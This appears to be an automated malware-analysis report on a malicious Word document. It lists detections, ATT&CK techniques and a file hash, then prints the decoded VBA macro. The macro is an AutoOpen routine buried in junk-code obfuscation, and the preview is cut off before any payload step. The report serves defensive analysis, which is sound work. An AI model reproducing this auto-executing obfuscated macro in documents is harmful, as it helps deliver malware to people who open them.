Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The 'AutoOpen' macro is present and configured to execute automatically, indicating an attempt to run malicious code upon opening. Heuristics indicate the use of GetObject, which can be used to execute code. The macro is heavily obfuscated, but its presence and automatic execution suggest it's designed to download and execute a secondary payload.
Heuristics (7)
- ClamAV: Doc.Malware.Generic-6666852-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Generic-6666852-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 42474 bytes |

SHA-256: fa5647267ef474fb415f180d4e98fec8fe87b53ed7ab341851fa6fb4fecb9596

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub lavYNEwKadaZIgEpiHya()
Debug.Print "coneTyTEbUtubESIKBIxO"
Dim DUcAhOCOReBIFECdUKk
For DUcAhOCOReBIFECdUKk = 10 To 10
Dim ZEsUQuZAmoXEWaZevAPuv
ZEsUQuZAmoXEWaZevAPuv = Fix(54733)
Next
Dim qIWOvhOPetUiUtOLYVYw
Debug.Print "LeWEseBydYK"
Dim wUSkUlIkEzElopoSU
wUSkUlIkEzElopoSU = Rnd(139)
If wUSkUlIkEzElopoSU > 38116 Then
wUSkUlIkEzElopoSU = Exp(9)
End If
qIWOvhOPetUiUtOLYVYw = Rnd(119)
ZOOnARogadErIiy = Val("65521.6") & "kXzEgESomOpu"
If qIWOvhOPetUiUtOLYVYw > 41343 Then
Dim ZAcYKIiYDIDAmavOsOZesgi
ZAcYKIiYDIDAmavOsOZesgi = Rnd(128)
If ZAcYKIiYDIDAmavOsOZesgi > 70526 Then
ZAcYKIiYDIDAmavOsOZesgi = Exp(8)
End If
qIWOvhOPetUiUtOLYVYw = Exp(9)
End If
BuGAhIhuaGesoKAWu = Val("53866.7") & "PuDItawupoHofOHAq"
fyXUaJECYboXOfOqiV = InStr("XyQPohODUqnua", "XyQPohODUqnuaXyQPohODUqnua")
Dim XUSiiEaVIjuLyVYLiWIVEla
Dim falMEnudyheJUfo
falMEnudyheJUfo = Log(9)
falMEnudyheJUfo = falMEnudyheJUfo + Log(11)
For XUSiiEaVIjuLyVYLiWIVEla = 5 To 13
Dim aAQaHiHAcumODaiYCiv
aAQaHiHAcumODaiYCiv = Fix(63590)
johEVWakUBoS = InStr("TPUWxiVoJ", "TPUWxiVoJTPUWxiVoJ")
Next
Dim kIDyTyKykuWySOD
kIDyTyKykuWySOD = Rnd(137)
If kIDyTyKykuWySOD > 46572 Then
kIDyTyKykuWySOD = Exp(7)
End If
QIzIjYbyjaq = Val("52345.6") & "dyKinEnaluBalOcILah"
Dim VipEDUDyXyWuLyNAmoBuwE
VipEDUDyXyWuLyNAmoBuwE = Log(4)
VipEDUDyXyWuLyNAmoBuwE = VipEDUDyXyWuLyNAmoBuwE + Log(13)
End Sub
Sub AutoOpen()
Dim Pefmudfq
Pefmudfq = Log(9)
Pefmudfq = Pefmudfq + Log(13)
Dim SeaoXIFOmaz
SeaoXIFOmaz = Log(6)
Dim ritASUGiBiNyJYgUFO
ritASUGiBiNyJYgUFO = Rnd(139)
If ritASUGiBiNyJYgUFO > 53597 Then
ritASUGiBiNyJYgUFO = Exp(9)
End If
Debug.Print "lowrUmiNEz"
SeaoXIFOmaz = SeaoXIFOmaz + Log(12)
tinuMYDixIhihIiokAPpOG = Val("69621.3") & "LyquluKEtYsaPOdevIKIr"
LFEwApIaoVUORYpO = 50460
Dim pItoXEUTEGEfIMA
For pItoXEUTEGEfIMA = 1 To 13
Dim maVUZAvobYt
maVUZAvobYt = Fix(45358)
Next
On Error Resume Next
Dim MoTEbOjuFygyvUZOb
MoTEbOjuFygyvUZOb = Rnd(105)
If MoTEbOjuFygyvUZOb > 33349 Then
MoTEbOjuFygyvUZOb = Exp(5)
End If
Dim geQiDynOXora
geQiDynOXora = Rnd(126)
If geQiDynOXora > 65488 Then
geQiDynOXora = Exp(6)
End If
Dim BOdoTEJwYkYaoUSEfeM
Dim iYPUJAgaBbEGUZ
For iYPUJAgaBbEGUZ = 6 To 10
Dim WzaduWaiIG
WzaduWaiIG = Fix(13905)
Next
BOdoTEJwYkYaoUSEfeM = Log(2)
Dim DaJabaCokYB
For DaJabaCokYB = 6 To 11
Dim iIZePOaAROZotoPmeSyheS
iIZePOaAROZotoPmeSyheS = Fix(98579)
Next
BOdoTEJwYkYaoUSEfeM = BOdoTEJwYkYaoUSEfeM + Log(13)
HeBozYLytiKyn = Val("79318.8") & "ikEieButYkEgeiOTYwo"
Dim ciJUPOctAr
For ciJUPOctAr = 1 To 12
Dim TEhRtAQAgiqISIRefyxEtE
TEhRtAQAgiqISIRefyxEtE = Fix(61358)
Next
Debug.Print "BuLeBecoroCUlAjorOb"
RaXaGIAZaZIioiAQzy = ""
Dim goJUmUOkUMovOtUpo
goJUmUOkUMovOtUpo = Rnd(115)
If goJUmUOkUMovOtUpo > 45302 Then
goJUmUOkUMovOtUpo = Exp(5)
End If
JUmTyQcEze = InStr("luUjEpIaeRYFOiIsEWog", "luUjEpIaeRYFOiIsEWogluUjEpIaeRYFOiIsEWog")
Dim JOqYaJYhectylOqASY
For JOqYaJYhectylOqASY = 6 To 13
Dim BEwErIKIToFytA
BEwErIKIToFytA = Fix(29506)
Next
lyCaseODOw = InStr("noWUSizihOPAsd", "noWUSizihOPAsdnoWUSizihOPAsd")
Dim vEbotiWLevufUPiwIrywAg
JIWINoQAXoBOuP = InStr("VEsDYjUsedIPIdaBuNIp", "VEsDYjUsedIPIdaBuNIpVEsDYjUsedIPIdaBuNIp")
KerySUCELuXF = Val("10967.4") & "PYVUWAdecYxetUv"
For vEbotiWLevufUPiwIrywAg = 1 To 10
Dim TAHNOvoMOgy
Dim syBOJETYHApibitAweZECa
syBOJETYHApibitAweZECa = Log(9)
syBOJETYHApibitAweZECa = syBOJETYHApibitAweZECa + Log(11)
TAHNOvoMOgy = Fix(76614)
zYSYkYjYvAH = InStr("HuiyJITyqeLyLUkUXuxYk", "HuiyJITyqeLyLUkUXuxYkHuiyJITyqeLyLUkUXuxYk")
Dim peCIreRuXEBe
For peCIreRuXEBe = 4 To 11
Dim raQeQIiaporer
raQeQIiaporer = Fix(91362)
Next
Next
Dim lyqUwumIhjZOLyr
pEnABAquLOiaiqAtOzU
... (truncated)